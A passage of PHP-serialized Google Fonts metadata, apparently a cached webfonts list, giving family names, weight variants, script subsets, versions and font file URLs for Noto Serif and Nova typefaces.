XL16exfnVwHpQVySg.ttf\";s:7:\"regular\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1t-xfnVwHpQVySg.ttf\";s:3:\"500\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1hexfnVwHpQVySg.ttf\";s:3:\"600\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1aetfnVwHpQVySg.ttf\";s:3:\"700\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1UOtfnVwHpQVySg.ttf\";s:3:\"800\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1N-tfnVwHpQVySg.ttf\";s:3:\"900\";s:116:\"http://fonts.gstatic.com/s/notoserifmalayalam/v20/JIAZUU5sdmdP_HMcVcZFcH7DeVBeGVgSMEk2cmVDq1ihUXL1HutfnVwHpQVySg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:997;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Myanmar\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:7:\"myanmar\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJudM7F2Yv76aBKKs-bHMQfAHUw3jnNwBDsU9X6RPzQ.ttf\";s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNbDHMefv2TeXJng.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNCDLMefv2TeXJng.ttf\";s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJsdM7F2Yv76aBKKs-bHMQfAHUw3jn1pBrocdDqRA.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNUDPMefv2TeXJng.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNfDTMefv2TeXJng.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNGDXMefv2TeXJng.ttf\";s:3:\"800\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNBDbMefv2TeXJng.ttf\";s:3:\"900\";s:98:\"http://fonts.gstatic.com/s/notoserifmyanmar/v12/VuJvdM7F2Yv76aBKKs-bHMQfAHUw3jnNIDfMefv2TeXJng.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:998;O:8:\"stdClass\":8:{s:6:\"family\";s:33:\"Noto Serif Nyiakeng Puachue Hmong\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:22:\"nyiakeng-puachue-hmong\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:144:\"http://fonts.gstatic.com/s/notoserifnyiakengpuachuehmong/v16/5h1jibMoOmIC3YuzLC-NZyLDZC8iwh-MTC8ggAjEhePFNRVcneAFp44kcYMUkNqVKhqPDFvbZkrZmb0.ttf\";s:3:\"500\";s:144:\"http://fonts.gstatic.com/s/notoserifnyiakengpuachuehmong/v16/5h1jibMoOmIC3YuzLC-NZyLDZC8iwh-MTC8ggAjEhePFNRVcneAFp44kcYMUkNqVKiiPDFvbZkrZmb0.ttf\";s:3:\"600\";s:144:\"http://fonts.gstatic.com/s/notoserifnyiakengpuachuehmong/v16/5h1jibMoOmIC3YuzLC-NZyLDZC8iwh-MTC8ggAjEhePFNRVcneAFp44kcYMUkNqVKsSIDFvbZkrZmb0.ttf\";s:3:\"700\";s:144:\"http://fonts.gstatic.com/s/notoserifnyiakengpuachuehmong/v16/5h1jibMoOmIC3YuzLC-NZyLDZC8iwh-MTC8ggAjEhePFNRVcneAFp44kcYMUkNqVKv2IDFvbZkrZmb0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:999;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Serif SC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:18:\"chinese-simplified\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mm63SzZBEtERe7U.otf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mgq0SzZBEtERe7U.otf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4chBXePl9DZ0Xe7gG9cyOj7oqCcbzhqDtg.otf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mlK1SzZBEtERe7U.otf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mn6ySzZBEtERe7U.otf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7mhqzSzZBEtERe7U.otf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/notoserifsc/v22/H4c8BXePl9DZ0Xe7gG9cyOj7miKxSzZBEtERe7U.otf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1000;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Sinhala\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"sinhala\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGxRlMsxaLRn3W-.ttf\";s:3:\"200\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pExR1MsxaLRn3W-.ttf\";s:3:\"300\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pHvR1MsxaLRn3W-.ttf\";s:7:\"regular\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGxR1MsxaLRn3W-.ttf\";s:3:\"500\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pGDR1MsxaLRn3W-.ttf\";s:3:\"600\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pFvQFMsxaLRn3W-.ttf\";s:3:\"700\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pFWQFMsxaLRn3W-.ttf\";s:3:\"800\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pExQFMsxaLRn3W-.ttf\";s:3:\"900\";s:128:\"http://fonts.gstatic.com/s/notoserifsinhala/v18/DtVEJwinQqclnZE2CnsPug9lgGC3y2F2nehQ7Eg4EdBKWxPiDxMivFLgRXs_-pEYQFMsxaLRn3W-.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1001;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Noto Serif TC\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:19:\"chinese-traditional\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0Bvr8vbX9GTsoOAX4.otf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvtssbX9GTsoOAX4.otf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLYgIZb5bJNDGYxLBibeHZ0BhnEESXFtUsM.otf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvoMtbX9GTsoOAX4.otf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0Bvq8qbX9GTsoOAX4.otf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvssrbX9GTsoOAX4.otf\";s:3:\"900\";s:86:\"http://fonts.gstatic.com/s/notoseriftc/v23/XLY9IZb5bJNDGYxLBibeHZ0BvvMpbX9GTsoOAX4.otf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1002;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Noto Serif Tamil\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecattN6R8Pz3v8Etew.ttf\";s:3:\"200\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatNN-R8Pz3v8Etew.ttf\";s:3:\"300\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecat6t-R8Pz3v8Etew.ttf\";s:7:\"regular\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecattN-R8Pz3v8Etew.ttf\";s:3:\"500\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatht-R8Pz3v8Etew.ttf\";s:3:\"600\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatatiR8Pz3v8Etew.ttf\";s:3:\"700\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatU9iR8Pz3v8Etew.ttf\";s:3:\"800\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatNNiR8Pz3v8Etew.ttf\";s:3:\"900\";s:124:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjndHr-klIgTfc40komjQ5OObazYp-6H94dBF-RX6nNRJfi-Gf55IgAecatHdiR8Pz3v8Etew.ttf\";s:9:\"100italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJx5svbzncQ9e3wx.ttf\";s:9:\"200italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJz5s_bzncQ9e3wx.ttf\";s:9:\"300italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJwns_bzncQ9e3wx.ttf\";s:6:\"italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJx5s_bzncQ9e3wx.ttf\";s:9:\"500italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJxLs_bzncQ9e3wx.ttf\";s:9:\"600italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJyntPbzncQ9e3wx.ttf\";s:9:\"700italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJyetPbzncQ9e3wx.ttf\";s:9:\"800italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJz5tPbzncQ9e3wx.ttf\";s:9:\"900italic\";s:126:\"http://fonts.gstatic.com/s/notoseriftamil/v21/LYjldHr-klIgTfc40komjQ5OObazSJaI_D5kV8k_WLwFBmWrypghjeOa18G4fJzQtPbzncQ9e3wx.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1003;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Serif Tangut\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:6:\"tangut\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/notoseriftangut/v15/xn76YGc72GKoTvER4Gn3b4m9Ern7Em41fcvN2KT4.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1004;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Serif Telugu\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9D9TGwuY2fjgrZYA.ttf\";s:3:\"200\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DdTCwuY2fjgrZYA.ttf\";s:3:\"300\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DqzCwuY2fjgrZYA.ttf\";s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9D9TCwuY2fjgrZYA.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DxzCwuY2fjgrZYA.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DKzewuY2fjgrZYA.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DEjewuY2fjgrZYA.ttf\";s:3:\"800\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DdTewuY2fjgrZYA.ttf\";s:3:\"900\";s:109:\"http://fonts.gstatic.com/s/notoseriftelugu/v20/tDbl2pCbnkEKmXNVmt2M1q6f4HWbbj6MRbYEeav7Fe9DXDewuY2fjgrZYA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1005;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Noto Serif Thai\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-08-16\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oiFuRRCmsdu0Qx.ttf\";s:3:\"200\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qiF-RRCmsdu0Qx.ttf\";s:3:\"300\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0p8F-RRCmsdu0Qx.ttf\";s:7:\"regular\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oiF-RRCmsdu0Qx.ttf\";s:3:\"500\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0oQF-RRCmsdu0Qx.ttf\";s:3:\"600\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0r8EORRCmsdu0Qx.ttf\";s:3:\"700\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0rFEORRCmsdu0Qx.ttf\";s:3:\"800\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qiEORRCmsdu0Qx.ttf\";s:3:\"900\";s:121:\"http://fonts.gstatic.com/s/notoserifthai/v19/k3kyo80MPvpLmixYH7euCxWpSMu3-gcWGj0hHAKGvUQlUv_bCKDUSzB5L0qLEORRCmsdu0Qx.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1006;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"Noto Serif Tibetan\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:1:{i:0;s:7:\"tibetan\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIrYdPS7rdSy_32c.ttf\";s:3:\"200\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIjYcPS7rdSy_32c.ttf\";s:3:\"300\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIugcPS7rdSy_32c.ttf\";s:7:\"regular\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIrYcPS7rdSy_32c.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIoQcPS7rdSy_32c.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmImgbPS7rdSy_32c.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIlEbPS7rdSy_32c.ttf\";s:3:\"800\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIjYbPS7rdSy_32c.ttf\";s:3:\"900\";s:111:\"http://fonts.gstatic.com/s/notoseriftibetan/v16/gokGH7nwAEdtF9N45n0Vaz7O-pk0wsvxHeDXMfqguoCmIh8bPS7rdSy_32c.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1007;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Noto Serif Yezidi\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:6:\"yezidi\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspD2yEkrlGJgmVCqg.ttf\";s:3:\"500\";s:109:\"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspD6SEkrlGJgmVCqg.ttf\";s:3:\"600\";s:109:\"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspDBSYkrlGJgmVCqg.ttf\";s:3:\"700\";s:109:\"http://fonts.gstatic.com/s/notoserifyezidi/v16/XLYPIYr5bJNDGYxLBibeHZAn3B5KJENnQjbfhMSVZspDPCYkrlGJgmVCqg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1008;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Noto Traditional Nushu\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"nushu\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/nototraditionalnushu/v16/SZco3EDkJ7q9FaoMPlmF4Su8hlIjoGh5aj67J011GNh6SYA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1009;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Nova Cut\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/novacut/v24/KFOkCnSYu8mL-39LkWxPKTM1K9nz.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1010;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nova Flat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/novaflat/v24/QdVUSTc-JgqpytEbVebEuStkm20oJA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1011;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nova Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"greek\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/novamono/v18/Cn-0JtiGWQ5Ajb--MRKfYGxYrdM9Sg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1012;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Nova 